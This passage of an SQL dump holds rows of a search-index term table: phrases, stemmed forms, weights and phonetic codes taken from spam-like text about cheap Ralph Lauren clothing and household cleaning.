ten',0,1,1.4667,'C5265235',1,'en'),(33808,'concerning ten minutes','concern ten minutes',0,1,1.7333,'C526523532',1,'en'),(33809,'connect','connect',0,0,0.4667,'C523',1,'en'),(33810,'connect water','connect water',0,1,1.4333,'C5236',1,'en'),(33811,'connect water cleansers','connect water cleansers',0,1,1.7667,'C5236245262',1,'en'),(33812,'constantly','constantli',0,0,0.6667,'C523534',2,'en'),(33813,'constantly to','constantli to',0,1,1.4333,'C5235343',1,'en'),(33814,'constantly to polo','constantli to polo',0,1,1.6,'C523534314',1,'en'),(33815,'contract would','contract would',0,1,1.4667,'C5362343',1,'en'),(33816,'contract would assist','contract would assist',0,1,1.7,'C536234323',1,'en'),(33817,'contractual','contractu',0,0,0.7333,'C536234',1,'en'),(33818,'contractual in','contractu in',0,1,1.4667,'C5362345',1,'en'),(33819,'contractual in nature','contractu in nature',0,1,1.7,'C536234536',1,'en'),(33820,'course','cours',0,0,0.4,'C620',1,'en'),(33821,'course the','cours the',0,1,1.3333,'C623',1,'en'),(33822,'course the procurement','cours the procurement',0,1,1.7333,'C623162653',1,'en'),(33823,'covers','cover',0,0,0.4,'C162',1,'en'),(33824,'custom made','custom made',0,1,1.3667,'C353',2,'en'),(33825,'custom made for','custom made for',0,1,1.5,'C35316',1,'en'),(33826,'definitely','definit',0,0,0.6667,'D1534',1,'en'),(33827,'definitely require','definit require',0,1,1.6,'D1534626',1,'en'),(33828,'definitely require professional','definit require professional',0,1,2,'D1534626161254',1,'en'),(33829,'delivered through','deliv through',0,1,1.5667,'D416362',1,'en'),(33830,'delivered through an','deliv through an',0,1,1.6667,'D4163625',1,'en'),(33831,'different strategy','differ strategy',0,1,1.6,'D165323632',1,'en'),(33832,'different strategy to','differ strategy to',0,1,1.7,'D1653236323',1,'en'),(33833,'done ralph','done ralph',0,1,1.3333,'D5641',1,'en'),(33834,'done ralph lauren','done ralph lauren',0,1,1.5667,'D5641465',1,'en'),(33835,'dress shirts','dress shirts',0,1,1.4,'D62632',2,'en'),(33836,'dress shirts for','dress shirts for',0,1,1.5333,'D6263216',1,'en'),(33837,'dress shirts let','dress shirts let',0,1,1.5333,'D6263243',1,'en'),(33838,'dress shirts online','dress shirts online',0,1,1.6333,'D62632545',1,'en'),(33839,'dress t','dress t',0,1,1.2333,'D623',1,'en'),(33840,'dress t tops','dress t tops',0,1,1.4,'D62312',1,'en'),(33841,'dresses going','dress going',0,1,1.4333,'D6252',1,'en'),(33842,'dresses going cheap','dress going cheap',0,1,1.6333,'D62521',1,'en'),(33843,'dresses take','dress take',0,1,1.4,'D6232',1,'en'),(33844,'dresses take in','dress take in',0,1,1.5,'D62325',1,'en'),(33845,'edge','edg',0,0,0.2667,'E320',1,'en'),(33846,'edge of','edg of',0,1,1.2333,'E321',1,'en'),(33847,'edge of the','edg of the',0,1,1.3667,'E3213',1,'en'),(33848,'effect of','effect of',0,1,1.3,'E1231',1,'en'),(33849,'effect of holding','effect of holding',0,1,1.5667,'E12314352',1,'en'),(33850,'employ professional','emploi professional',0,1,1.6333,'E514161254',1,'en'),(33851,'employ professional cleaners','emploi professional cleaners',0,1,1.9333,'E51416125424562',1,'en'),(33852,'ensure a','ensur a',0,1,1.2667,'E526',1,'en'),(33853,'ensure a thoroughly','ensur a thoroughly',0,1,1.6333,'E5263624',1,'en'),(33854,'established regular','establish regular',0,1,1.6333,'E2314236246',1,'en'),(33855,'established regular cleaning','establish regular cleaning',0,1,1.9333,'E23142362462452',1,'en'),(33856,'evaluate','evalu',0,0,0.5333,'E143',1,'en'),(33857,'evaluate the','evalu the',0,1,1.4,'E143',1,'en'),(33858,'evaluate the various','evalu the various',0,1,1.6667,'E143162',1,'en'),(33859,'example look','exampl look',0,1,1.4,'E25142',1,'en'),(33860,'example look at','exampl look at',0,1,1.5,'E251423',1,'en'),(33861,'exists','exist',0,0,0.4,'E232',1,'en'),(33862,'exists and','exist and',0,1,1.3333,'E23253',1,'en'),(33863,'exists and for','exist and for',0,1,1.4667,'E2325316',1,'en'),(33864,'expanses','expans',0,0,0.5333,'E2152',1,'en'),(33865,'expanses cheap','expans cheap',0,1,1.4667,'E21521',1,'en'),(33866,'expanses cheap polo','expans cheap polo',0,1,1.6333,'E215214',1,'en'),(33867,'expert services','expert services',0,1,1.5,'E21632612',1,'en'),(33868,'expert services that','expert services that',0,1,1.6667,'E216326123',1,'en'),(33869,'expert to','expert to',0,1,1.3,'E2163',1,'en'),(33870,'expert to ralph','expert to ralph',0,1,1.5,'E2163641',1,'en'),(33871,'fashion','fashion',0,0,0.4667,'F250',4,'en'),(33872,'fashion the','fashion the',0,1,1.3667,'F253',1,'en'),(33873,'fashion the cheap','fashion the cheap',0,1,1.5667,'F25321',1,'en'),(33874,'fat','fat',0,0,0.2,'F300',1,'en'),(33875,'fat big','fat big',0,1,1.2333,'F312',1,'en'),(33876,'fat big books','fat big books',0,1,1.4333,'F31212',1,'en'),(33877,'faucet','faucet',0,0,0.4,'F230',1,'en'),(33878,'faucet water','faucet water',0,1,1.4,'F236',1,'en'),(33879,'faucet water the','faucet water the',0,1,1.5333,'F2363',1,'en'),(33880,'females','femal',0,0,0.4667,'F542',2,'en'),(33881,'females very','femal very',0,1,1.4,'F54216',1,'en'),(33882,'females very mens','femal very mens',0,1,1.5667,'F5421652',1,'en'),(33883,'fit outlet','fit outlet',0,1,1.3333,'F343',1,'en'),(33884,'fit outlet that','fit outlet that',0,1,1.5,'F343',1,'en'),(33885,'flip','flip',0,0,0.2667,'F410',2,'en'),(33886,'flip polo','flip polo',0,1,1.3,'F414',1,'en'),(33887,'flip polo ralph','flip polo ralph',0,1,1.5,'F414641',1,'en'),(33888,'flip womens','flip womens',0,1,1.3667,'F4152',1,'en'),(33889,'flip womens ralph','flip womens ralph',0,1,1.5667,'F4152641',1,'en'),(33890,'fold a','fold a',0,1,1.2,'F430',1,'en'),(33891,'fold a towel','fold a towel',0,1,1.4,'F434',1,'en'),(33892,'for a natural','for a natural',0,1,1.4333,'F65364',1,'en'),(33893,'for all','for all',0,1,1.2333,'F640',2,'en'),(33894,'for all ralph','for all ralph',0,1,1.4333,'F64641',1,'en'),(33895,'for any household','for any household',0,1,1.5667,'F65243',1,'en'),(33896,'for any wholesale','for any wholesale',0,1,1.5667,'F65424',1,'en'),(33897,'for businesses','for businesses',0,1,1.4667,'F61252',1,'en'),(33898,'for businesses the','for businesses the',0,1,1.6,'F612523',1,'en'),(33899,'for cheap','for cheap',0,1,1.3,'F621',1,'en'),(33900,'for cheap expanses','for cheap expanses',0,1,1.6,'F6212152',1,'en'),(33901,'for cheap some','for cheap some',0,1,1.4667,'F62125',1,'en'),(33902,'for concerning','for concerning',0,1,1.4667,'F6252652',1,'en'),(33903,'for concerning ten','for concerning ten',0,1,1.6,'F625265235',1,'en'),(33904,'for girls','for girls',0,1,1.3,'F62642',1,'en'),(33905,'for girls outlet','for girls outlet',0,1,1.5333,'F62642343',1,'en'),(33906,'for kids','for kids',0,1,1.2667,'F6232',1,'en'),(33907,'for kids will','for kids will',0,1,1.4333,'F62324',1,'en'),(33908,'for kids windows','for kids windows',0,1,1.5333,'F6232532',1,'en'),(33909,'for men a','for men a',0,1,1.3,'F650',2,'en'),(33910,'for men all','for men all',0,1,1.3667,'F654',1,'en'),(33911,'for men amongst','for men amongst',0,1,1.5,'F6523',1,'en'),(33912,'for men cleaning','for men cleaning',0,1,1.5333,'F652452',1,'en'),(33913,'for men complete','for men complete',0,1,1.5333,'F6525143',1,'en'),(33914,'for men for','for men for',0,1,1.3667,'F6516',2,'en'),(33915,'for men growth','for men growth',0,1,1.4667,'F65263',1,'en'),(33916,'for men is','for men is',0,1,1.3333,'F652',1,'en'),(33917,'for men not','for men not',0,1,1.3667,'F653',1,'en'),(33918,'for men other','for men other',0,1,1.4333,'F6536',1,'en'),(33919,'for men projects','for men projects',0,1,1.5333,'F6516232',1,'en'),(33920,'for men simplest','for men simplest',0,1,1.5333,'F65251423',1,'en'),(33921,'for men soaked','for men soaked',0,1,1.4667,'F6523',1,'en'),(33922,'for men space','for men space',0,1,1.4333,'F65212',1,'en'),(33923,'for men tasks','for men tasks',0,1,1.4333,'F6532',1,'en'),(33924,'for men things','for men things',0,1,1.4667,'F65352',1,'en'),(33925,'for men types','for men types',0,1,1.4333,'F65312',1,'en'),(33926,'for men water','for men water',0,1,1.4333,'F6536',1,'en'),(33927,'for mens','for mens',0,1,1.2667,'F652',1,'en'),(33928,'for mens ralph','for mens ralph',0,1,1.4667,'F652641',1,'en'),(33929,'for ralph','for ralph',0,1,1.3,'F641',1,'en'),(33930,'for ralph lauren','for ralph lauren',0,1,1.5333,'F641465',1,'en'),(33931,'for that','for that',0,1,1.2667,'F630',1,'en'),(33932,'for that reason','for that reason',0,1,1.5,'F63625',1,'en'),(33933,'for this usual','for this usual',0,1,1.4667,'F6324',1,'en'),(33934,'for women positive','for women positive',0,1,1.6,'F651231',1,'en'),(33935,'for women serve','for women serve',0,1,1.5,'F65261',1,'en'),(33936,'for women that','for women that',0,1,1.4667,'F653',1,'en'),(33937,'fresh stains','fresh stains',0,1,1.4,'F62352',1,'en'),(33938,'fresh stains are','fresh stains are',0,1,1.5333,'F623526',1,'en'),(33939,'fresh water','fresh water',0,1,1.3667,'F6236',1,'en'),(33940,'fresh water that','fresh water that',0,1,1.5333,'F62363',1,'en'),(33941,'from suppliers','from suppliers',0,1,1.4667,'F6521462',1,'en'),(33942,'from suppliers womens','from suppliers womens',0,1,1.7,'F652146252',1,'en'),(33943,'furnish','furnish',0,0,0.4667,'F652',1,'en'),(33944,'furnish as','furnish as',0,1,1.3333,'F652',1,'en'),(33945,'furnish as an','furnish as an',0,1,1.4333,'F6525',1,'en'),(33946,'get done','get done',0,1,1.2667,'G350',1,'en'),(33947,'get done ralph','get done ralph',0,1,1.4667,'G35641',1,'en'),(33948,'get in','get in',0,1,1.2,'G350',1,'en'),(33949,'get in mens','get in mens',0,1,1.3667,'G352',1,'en'),(33950,'get practical','get practical',0,1,1.4333,'G3162324',1,'en'),(33951,'get practical quickly','get practical quickly',0,1,1.7,'G316232424',1,'en'),(33952,'girls outlet','girl outlet',0,1,1.4,'G642343',1,'en'),(33953,'girls outlet the','girl outlet the',0,1,1.5333,'G642343',1,'en'),(33954,'girls something','girl something',0,1,1.5,'G6425352',1,'en'),(33955,'girls something ralph','girl something ralph',0,1,1.7,'G6425352641',1,'en'),(33956,'glass like','glass like',0,1,1.3333,'G4242',1,'en'),(33957,'glass like polo','glass like polo',0,1,1.5,'G424214',1,'en'),(33958,'glass sheets','glass sheets',0,1,1.4,'G4232',1,'en'),(33959,'glass sheets sometimes','glass sheets sometimes',0,1,1.7333,'G42325352',1,'en'),(33960,'going cheap','go cheap',0,1,1.3667,'G521',1,'en'),(33961,'going cheap polo','go cheap polo',0,1,1.5333,'G5214',1,'en'),(33962,'growing','grow',0,0,0.4667,'G652',2,'en'),(33963,'growing businesses','grow businesses',0,1,1.6,'G6521252',1,'en'),(33964,'growing businesses would','grow businesses would',0,1,1.8,'G652125243',1,'en'),(33965,'growth i','growth i',0,1,1.2667,'G630',1,'en'),(33966,'growth i talking','growth i talking',0,1,1.5333,'G634252',1,'en'),(33967,'handbags','handbag',0,0,0.5333,'H5312',2,'en'),(33968,'handbags on','handbag on',0,1,1.3667,'H53125',1,'en'),(33969,'handbags on sale','handbag on sale',0,1,1.5333,'H5312524',1,'en'),(33970,'handbags ordinary','handbag ordinary',0,1,1.5667,'H53126356',1,'en'),(33971,'handbags ordinary faucet','handbag ordinary faucet',0,1,1.8,'H53126356123',1,'en'),(33972,'handle','handl',0,0,0.4,'H534',2,'en'),(33973,'handle if','handl if',0,1,1.3,'H5341',1,'en'),(33974,'handle if you','handl if you',0,1,1.4333,'H5341',1,'en'),(33975,'handy too','handi too',0,1,1.3,'H530',1,'en'),(33976,'handy too much','handi too much',0,1,1.4667,'H5352',1,'en'),(33977,'hats','hat',0,0,0.2667,'H320',1,'en'),(33978,'hats manage','hat manage',0,1,1.3667,'H3252',1,'en'),(33979,'hats manage to','hat manage to',0,1,1.4667,'H32523',1,'en'),(33980,'hats online','hat online',0,1,1.3667,'H32545',1,'en'),(33981,'hats online section','hat online section',0,1,1.6333,'H32545235',1,'en'),(33982,'hats sale','hat sale',0,1,1.3,'H324',1,'en'),(33983,'hats sale bottle','hat sale bottle',0,1,1.5333,'H324134',1,'en'),(33984,'hats these','hat these',0,1,1.3333,'H3232',1,'en'),(33985,'hats these are','hat these are',0,1,1.4667,'H32326',1,'en'),(33986,'have ralph','have ralph',0,1,1.3333,'H1641',2,'en'),(33987,'have ralph lauren','have ralph lauren',0,1,1.5667,'H1641465',2,'en'),(33988,'heavy','heavi',0,0,0.3333,'H100',2,'en'),(33989,'heavy body','heavi body',0,1,1.3333,'H130',1,'en'),(33990,'heavy body mens','heavi body mens',0,1,1.5,'H1352',1,'en'),(33991,'him and','him and',0,1,1.2333,'H530',1,'en'),(33992,'him and i','him and i',0,1,1.3,'H530',1,'en'),(33993,'holding a','hold a',0,1,1.3,'H4352',1,'en'),(33994,'holding a non','hold a non',0,1,1.4333,'H43525',1,'en'),(33995,'home windows','home windows',0,1,1.4,'H532',1,'en'),(33996,'home windows they','home windows they',0,1,1.5667,'H5323',1,'en'),(33997,'hooded','hood',0,0,0.4,'H300',2,'en'),(33998,'hooded sweatshirts','hood sweatshirts',0,1,1.6,'H3232632',2,'en'),(33999,'hooded sweatshirts men','hood sweatshirts men',0,1,1.7333,'H32326325',1,'en'),(34000,'hoodies','hoodi',0,0,0.4667,'H320',2,'en'),(34001,'hoodies category','hoodi category',0,1,1.5333,'H32326',1,'en'),(34002,'hoodies category is','hoodi category is',0,1,1.6333,'H323262',1,'en'),(34003,'hoodies fat','hoodi fat',0,1,1.3667,'H3213',1,'en'),(34004,'hoodies fat big','hoodi fat big',0,1,1.5,'H321312',1,'en'),(34005,'hoodies females','hoodi females',0,1,1.5,'H321542',1,'en'),(34006,'hoodies females very','hoodi females very',0,1,1.6667,'H32154216',1,'en'),(34007,'hoodies for','hoodi for',0,1,1.3667,'H3216',1,'en'),(34008,'hoodies for men','hoodi for men',0,1,1.5,'H32165',1,'en'),(34009,'hoodies mens','hoodi mens',0,1,1.4,'H3252',1,'en'),(34010,'hoodies mens purchasing','hoodi mens purchasing',0,1,1.7667,'H325216252',1,'en'),(34011,'hoodies online','hoodi online',0,1,1.4667,'H32545',1,'en'),(34012,'hoodies online carpet','hoodi online carpet',0,1,1.7,'H325452613',1,'en'),(34013,'hoodies online fresh','hoodi online fresh',0,1,1.6667,'H32545162',1,'en'),(34014,'hoodies outlet','hoodi outlet',0,1,1.4667,'H32343',2,'en'),(34015,'hoodies outlet actually','hoodi outlet actually',0,1,1.7667,'H32343234',1,'en'),(34016,'hoodies towels','hoodi towels',0,1,1.4667,'H32342',1,'en'),(34017,'hoodies towels cheap','hoodi towels cheap',0,1,1.6667,'H323421',1,'en'),(34018,'hoodies up','hoodi up',0,1,1.3333,'H321',1,'en'),(34019,'hoodies up the','hoodi up the',0,1,1.4667,'H3213',1,'en'),(34020,'hoodies women','hoodi women',0,1,1.4333,'H325',2,'en'),(34021,'hoodies women him','hoodi women him',0,1,1.5667,'H325',1,'en'),(34022,'hoses','hose',0,0,0.3333,'H200',1,'en'),(34023,'hoses so','hose so',0,1,1.2667,'H200',1,'en'),(34024,'hoses so that','hose so that',0,1,1.4333,'H230',1,'en'),(34025,'household','household',0,0,0.6,'H243',1,'en'),(34026,'household and','household and',0,1,1.4333,'H24353',1,'en'),(34027,'household and polo','household and polo',0,1,1.6,'H2435314',1,'en'),(34028,'household ralph','household ralph',0,1,1.5,'H243641',1,'en'),(34029,'household ralph lauren','household ralph lauren',0,1,1.7333,'H243641465',1,'en'),(34030,'household they','household they',0,1,1.4667,'H243',1,'en'),(34031,'household they polo','household they polo',0,1,1.6333,'H24314',1,'en'),(34032,'however the','howev the',0,1,1.3667,'H163',1,'en'),(34033,'however the needs','howev the needs',0,1,1.5667,'H163532',1,'en'),(34034,'i established','i established',0,1,1.4333,'I231423',1,'en'),(34035,'i established regular','i established regular',0,1,1.7,'I2314236246',1,'en'),(34036,'i talking','i talking',0,1,1.3,'I34252',1,'en'),(34037,'i talking and','i talking and',0,1,1.4333,'I3425253',1,'en'),(34038,'if you get','if you get',0,1,1.3333,'I123',1,'en'),(34039,'immensely','immens',0,0,0.6,'I524',1,'en'),(34040,'immensely necessary','immens necessary',0,1,1.6333,'I524526',1,'en'),(34041,'immensely necessary for','immens necessary for',0,1,1.7667,'I52452616',1,'en'),(34042,'in addition of','in addition of',0,1,1.4667,'I5351',1,'en'),(34043,'in flip','in flip',0,1,1.2333,'I5141',1,'en'),(34044,'in flip womens','in flip womens',0,1,1.4667,'I514152',1,'en'),(34045,'in handy','in handy',0,1,1.2667,'I530',1,'en'),(34046,'in handy too','in handy too',0,1,1.4,'I530',1,'en'),(34047,'in mens','in mens',0,1,1.2333,'I520',1,'en'),(34048,'in mens ralph','in mens ralph',0,1,1.4333,'I52641',1,'en'),(34049,'in nature','in nature',0,1,1.3,'I536',1,'en'),(34050,'in nature along','in nature along',0,1,1.5,'I536452',1,'en'),(34051,'in nature exists','in nature exists',0,1,1.5333,'I536232',1,'en'),(34052,'in term','in term',0,1,1.2333,'I5365',1,'en'),(34053,'in term of','in term of',0,1,1.3333,'I53651',1,'en'),(34054,'in the edge','in the edge',0,1,1.3667,'I532',1,'en'),(34055,'in the time','in the time',0,1,1.3667,'I535',1,'en'),(34056,'include large','includ large',0,1,1.4333,'I5243462',1,'en'),(34057,'include large ralph','includ large ralph',0,1,1.6333,'I5243462641',1,'en'),(34058,'indeed','inde',0,0,0.4,'I530',1,'en'),(34059,'indeed but','inde but',0,1,1.3333,'I5313',1,'en'),(34060,'indeed but amid','inde but amid',0,1,1.5,'I531353',1,'en'),(34061,'input it','input it',0,1,1.2667,'I513',1,'en'),(34062,'input it throughout','input it throughout',0,1,1.6333,'I513623',1,'en'),(34063,'into it','into it',0,1,1.2333,'I530',1,'en'),(34064,'into it ralph','into it ralph',0,1,1.4333,'I53641',1,'en'),(34065,'inventory','inventori',0,0,0.6,'I51536',1,'en'),(34066,'inventory so','inventori so',0,1,1.4,'I515362',1,'en'),(34067,'inventory so you','inventori so you',0,1,1.5333,'I515362',1,'en'),(34068,'invest','invest',0,0,0.4,'I5123',1,'en'),(34069,'invest for','invest for',0,1,1.3333,'I512316',1,'en'),(34070,'invest for ralph','invest for ralph',0,1,1.5333,'I51231641',1,'en'),(34071,'involving','involv',0,0,0.6,'I514152',1,'en'),(34072,'involving cleaning','involv cleaning',0,1,1.6,'I514152452',1,'en'),(34073,'involving cleaning this','involv cleaning this',0,1,1.7667,'I51415245232',1,'en'),(34074,'inwards','inward',0,0,0.4667,'I5632',1,'en'),(34075,'inwards until','inward until',0,1,1.4333,'I5632534',1,'en'),(34076,'inwards until it','inward until it',0,1,1.5333,'I56325343',1,'en'),(34077,'is business','is business',0,1,1.3667,'I21252',1,'en'),(34078,'is business success','is business success',0,1,1.6333,'I21252',1,'en'),(34079,'is clean','is clean',0,1,1.2667,'I245',1,'en'),(34080,'is clean a','is clean a',0,1,1.3333,'I245',1,'en'),(34081,'is mens','is mens',0,1,1.2333,'I252',1,'en'),(34082,'is mens ralph','is mens ralph',0,1,1.4333,'I252641',1,'en'),(34083,'is not polo','is not polo',0,1,1.3667,'I25314',1,'en'),(34084,'is of','is of',0,1,1.1667,'I210',1,'en'),(34085,'is of course','is of course',0,1,1.4,'I21262',1,'en'),(34086,'is polo ralph','is polo ralph',0,1,1.4333,'I214641',2,'en'),(34087,'is required','is required',0,1,1.3667,'I26263',1,'en'),(34088,'is required for','is required for',0,1,1.5,'I2626316',1,'en'),(34089,'is usually','is usually',0,1,1.3333,'I240',1,'en'),(34090,'is usually to','is usually to',0,1,1.4333,'I243',1,'en'),(34091,'it cheap','it cheap',0,1,1.2667,'I321',1,'en'),(34092,'it cheap ralph','it cheap ralph',0,1,1.4667,'I321641',1,'en'),(34093,'it covers','it covers',0,1,1.3,'I32162',1,'en'),(34094,'it perfectly ralph','it perfectly ralph',0,1,1.6,'I3161234641',1,'en'),(34095,'it ralph','it ralph',0,1,1.2667,'I3641',1,'en'),(34096,'it ralph lauren','it ralph lauren',0,1,1.5,'I3641465',1,'en'),(34097,'it throughout','it throughout',0,1,1.4333,'I3623',1,'en'),(34098,'it throughout the','it throughout the',0,1,1.5667,'I3623',1,'en'),(34099,'italia are','italia are',0,1,1.3333,'I346',1,'en'),(34100,'italia are tricky','italia are tricky',0,1,1.5667,'I346362',1,'en'),(34101,'italia blemish','italia blemish',0,1,1.4667,'I341452',1,'en'),(34102,'italia blemish inwards','italia blemish inwards',0,1,1.7333,'I3414525632',1,'en'),(34103,'jackets','jacket',0,0,0.4667,'J320',3,'en'),(34104,'jackets for','jacket for',0,1,1.3667,'J3216',1,'en'),(34105,'jackets for men','jacket for men',0,1,1.5,'J32165',1,'en'),(34106,'jackets variety','jacket variety',0,1,1.5,'J32163',1,'en'),(34107,'jackets variety of','jacket variety of',0,1,1.6,'J321631',1,'en'),(34108,'kids','kid',0,0,0.2667,'K320',3,'en'),(34109,'kids will','kid will',0,1,1.3,'K324',1,'en'),(34110,'kids will comprehensive','kid will comprehensive',0,1,1.7667,'K3242516521',1,'en'),(34111,'kids windows','kid windows',0,1,1.4,'K32532',1,'en'),(34112,'kids windows yourself','kid windows yourself',0,1,1.7,'K325326241',1,'en'),(34113,'large ralph','larg ralph',0,1,1.3667,'L62641',2,'en'),(34114,'large ralph lauren','larg ralph lauren',0,1,1.6,'L62641465',2,'en'),(34115,'lauren accessories','lauren accessories',0,1,1.6,'L65262',1,'en'),(34116,'lauren accessories carpet','lauren accessories carpet',0,1,1.8333,'L65262613',1,'en'),(34117,'lauren bags','lauren bags',0,1,1.3667,'L6512',1,'en'),(34118,'lauren bags cheap','lauren bags cheap',0,1,1.5667,'L65121',1,'en'),(34119,'lauren bags clean','lauren bags clean',0,1,1.5667,'L651245',1,'en'),(34120,'lauren belts','lauren belts',0,1,1.4,'L651432',1,'en'),(34121,'lauren belts cheap','lauren belts cheap',0,1,1.6,'L6514321',1,'en'),(34122,'lauren belts online','lauren belts online',0,1,1.6333,'L651432545',1,'en'),(34123,'lauren custom','lauren custom',0,1,1.4333,'L65235',1,'en'),(34124,'lauren custom made','lauren custom made',0,1,1.6,'L652353',1,'en'),(34125,'lauren dress','lauren dress',0,1,1.4,'L65362',2,'en'),(34126,'lauren dress shirts','lauren dress shirts',0,1,1.6333,'L65362632',2,'en'),(34127,'lauren dress t','lauren dress t',0,1,1.4667,'L653623',1,'en'),(34128,'lauren ensure','lauren ensure',0,1,1.4333,'L6526',1,'en'),(34129,'lauren ensure a','lauren ensure a',0,1,1.5,'L6526',1,'en'),(34130,'lauren for','lauren for',0,1,1.3333,'L6516',1,'en'),(34131,'lauren for women','lauren for women',0,1,1.5333,'L65165',1,'en'),(34132,'lauren girls','lauren girls',0,1,1.4,'L652642',1,'en'),(34133,'lauren girls something','lauren girls something',0,1,1.7333,'L6526425352',1,'en'),(34134,'lauren handbags','lauren handbags',0,1,1.5,'L65312',1,'en'),(34135,'lauren handbags ordinary','lauren handbags ordinary',0,1,1.8,'L653126356',1,'en'),(34136,'lauren hats','lauren hats',0,1,1.3667,'L6532',1,'en'),(34137,'lauren hats manage','lauren hats manage',0,1,1.6,'L653252',1,'en'),(34138,'lauren hats online','lauren hats online',0,1,1.6,'L6532545',1,'en'),(34139,'lauren hooded','lauren hooded',0,1,1.4333,'L653',2,'en'),(34140,'lauren hooded sweatshirts','lauren hooded sweatshirts',0,1,1.8333,'L653232632',2,'en'),(34141,'lauren hoodies','lauren hoodies',0,1,1.4667,'L6532',2,'en'),(34142,'lauren hoodies fat','lauren hoodies fat',0,1,1.6,'L653213',1,'en'),(34143,'lauren hoodies females','lauren hoodies females',0,1,1.7333,'L65321542',1,'en'),(34144,'lauren hoodies for','lauren hoodies for',0,1,1.6,'L653216',1,'en'),(34145,'lauren hoodies mens','lauren hoodies mens',0,1,1.6333,'L653252',1,'en'),(34146,'lauren hoodies women','lauren hoodies women',0,1,1.6667,'L65325',2,'en'),(34147,'lauren italia are','lauren italia are',0,1,1.5667,'L65346',1,'en'),(34148,'lauren jackets','lauren jackets',0,1,1.4667,'L65232',1,'en'),(34149,'lauren jackets for','lauren jackets for',0,1,1.6,'L6523216',1,'en'),(34150,'lauren jackets variety','lauren jackets variety',0,1,1.7333,'L65232163',1,'en'),(34151,'lauren long','lauren long',0,1,1.3667,'L65452',2,'en'),(34152,'lauren long sleeve','lauren long sleeve',0,1,1.6,'L6545241',2,'en'),(34153,'lauren men','lauren men',0,1,1.3333,'L650',2,'en'),(34154,'lauren men s','lauren men s',0,1,1.4,'L652',2,'en'),(34155,'lauren mens','lauren mens',0,1,1.3667,'L652',2,'en'),(34156,'lauren mens hoodies','lauren mens hoodies',0,1,1.6333,'L65232',2,'en'),(34157,'lauren mens outlet','lauren mens outlet',0,1,1.6,'L652343',1,'en'),(34158,'lauren mens sandals','lauren mens sandals',0,1,1.6333,'L6525342',1,'en'),(34159,'lauren mens sport','lauren mens sport',0,1,1.5667,'L652163',1,'en'),(34160,'lauren mens striped','lauren mens striped',0,1,1.6333,'L6523613',1,'en'),(34161,'lauren polo accessories','lauren polo accessories',0,1,1.7667,'L6514262',1,'en'),(34162,'lauren polo apparatus','lauren polo apparatus',0,1,1.7,'L65141632',1,'en'),(34163,'lauren polo bags','lauren polo bags',0,1,1.5333,'L651412',2,'en'),(34164,'lauren polo belts','lauren polo belts',0,1,1.5667,'L65141432',1,'en'),(34165,'lauren polo boys','lauren polo boys',0,1,1.5333,'L651412',1,'en'),(34166,'lauren polo cheap','lauren polo cheap',0,1,1.5667,'L651421',1,'en'),(34167,'lauren polo classic','lauren polo classic',0,1,1.6333,'L6514242',1,'en'),(34168,'lauren polo dress','lauren polo dress',0,1,1.5667,'L6514362',1,'en'),(34169,'lauren polo for','lauren polo for',0,1,1.5,'L651416',2,'en'),(34170,'lauren polo handbags','lauren polo handbags',0,1,1.6667,'L65145312',2,'en'),(34171,'lauren polo hats','lauren polo hats',0,1,1.5333,'L651432',1,'en'),(34172,'lauren polo mens','lauren polo mens',0,1,1.5333,'L651452',2,'en'),(34173,'lauren polo scarves','lauren polo scarves',0,1,1.6333,'L65142612',2,'en'),(34174,'lauren polo shirts','lauren polo shirts',0,1,1.6,'L65142632',2,'en'),(34175,'lauren polo shoes','lauren polo shoes',0,1,1.5667,'L65142',1,'en'),(34176,'lauren polo sport','lauren polo sport',0,1,1.5667,'L65142163',2,'en'),(34177,'lauren polo sweaters','lauren polo sweaters',0,1,1.6667,'L65142362',1,'en'),(34178,'lauren polo womens','lauren polo womens',0,1,1.6,'L651452',1,'en'),(34179,'lauren polos','lauren polos',0,1,1.4,'L65142',1,'en'),(34180,'lauren polos for','lauren polos for',0,1,1.5333,'L6514216',1,'en'),(34181,'lauren sandals','lauren sandals',0,1,1.4667,'L6525342',2,'en'),(34182,'lauren sandals for','lauren sandals for',0,1,1.6,'L652534216',2,'en'),(34183,'lauren sandals under','lauren sandals under',0,1,1.6667,'L6525342536',1,'en'),(34184,'lauren sandals women','lauren sandals women',0,1,1.6667,'L65253425',1,'en'),(34185,'lauren scarves','lauren scarves',0,1,1.4667,'L652612',2,'en'),(34186,'lauren scarves cheap','lauren scarves cheap',0,1,1.6667,'L6526121',1,'en'),(34187,'lauren scarves store','lauren scarves store',0,1,1.6667,'L65261236',2,'en'),(34188,'lauren shirts','lauren shirts',0,1,1.4333,'L652632',1,'en'),(34189,'lauren shirts for','lauren shirts for',0,1,1.5667,'L65263216',1,'en'),(34190,'lauren shirts small','lauren shirts small',0,1,1.6333,'L65263254',1,'en'),(34191,'lauren shoes','lauren shoes',0,1,1.4,'L652',2,'en'),(34192,'lauren shoes for','lauren shoes for',0,1,1.5333,'L65216',2,'en'),(34193,'lauren shorts','lauren shorts',0,1,1.4333,'L652632',2,'en'),(34194,'lauren shorts a','lauren shorts a',0,1,1.5,'L652632',1,'en'),(34195,'lauren shorts men','lauren shorts men',0,1,1.5667,'L6526325',2,'en'),(34196,'lauren sport','lauren sport',0,1,1.4,'L652163',2,'en'),(34197,'lauren sport shirt','lauren sport shirt',0,1,1.6,'L652163263',2,'en'),(34198,'lauren striped','lauren striped',0,1,1.4667,'L6523613',1,'en'),(34199,'lauren striped shirts','lauren striped shirts',0,1,1.7,'L65236132632',1,'en'),(34200,'lauren sweaters','lauren sweaters',0,1,1.5,'L652362',2,'en'),(34201,'lauren sweaters with','lauren sweaters with',0,1,1.6667,'L6523623',1,'en'),(34202,'lauren sweaters women','lauren sweaters women',0,1,1.7,'L6523625',1,'en'),(34203,'lauren women','lauren women',0,1,1.4,'L650',2,'en'),(34204,'lauren women dresses','lauren women dresses',0,1,1.6667,'L65362',2,'en'),(34205,'lauren women s','lauren women s',0,1,1.4667,'L652',2,'en'),(34206,'lauren womens','lauren womens',0,1,1.4333,'L652',2,'en'),(34207,'lauren womens hoodies','lauren womens hoodies',0,1,1.7,'L65232',2,'en'),(34208,'lauren womens sandals','lauren womens sandals',0,1,1.7,'L6525342',1,'en'),(34209,'lauren womens sport','lauren womens sport',0,1,1.6333,'L652163',1,'en'),(34210,'lauren womens sweaters','lauren womens sweaters',0,1,1.7333,'L652362',2,'en'),(34211,'leaves no','leav no',0,1,1.3,'L125',1,'en'),(34212,'leaves no residue','leav no residue',0,1,1.5667,'L125623',1,'en'),(34213,'let us','let us',0,1,1.2,'L320',1,'en'),(34214,'let us look','let us look',0,1,1.3667,'L3242',1,'en'),(34215,'like polo','like 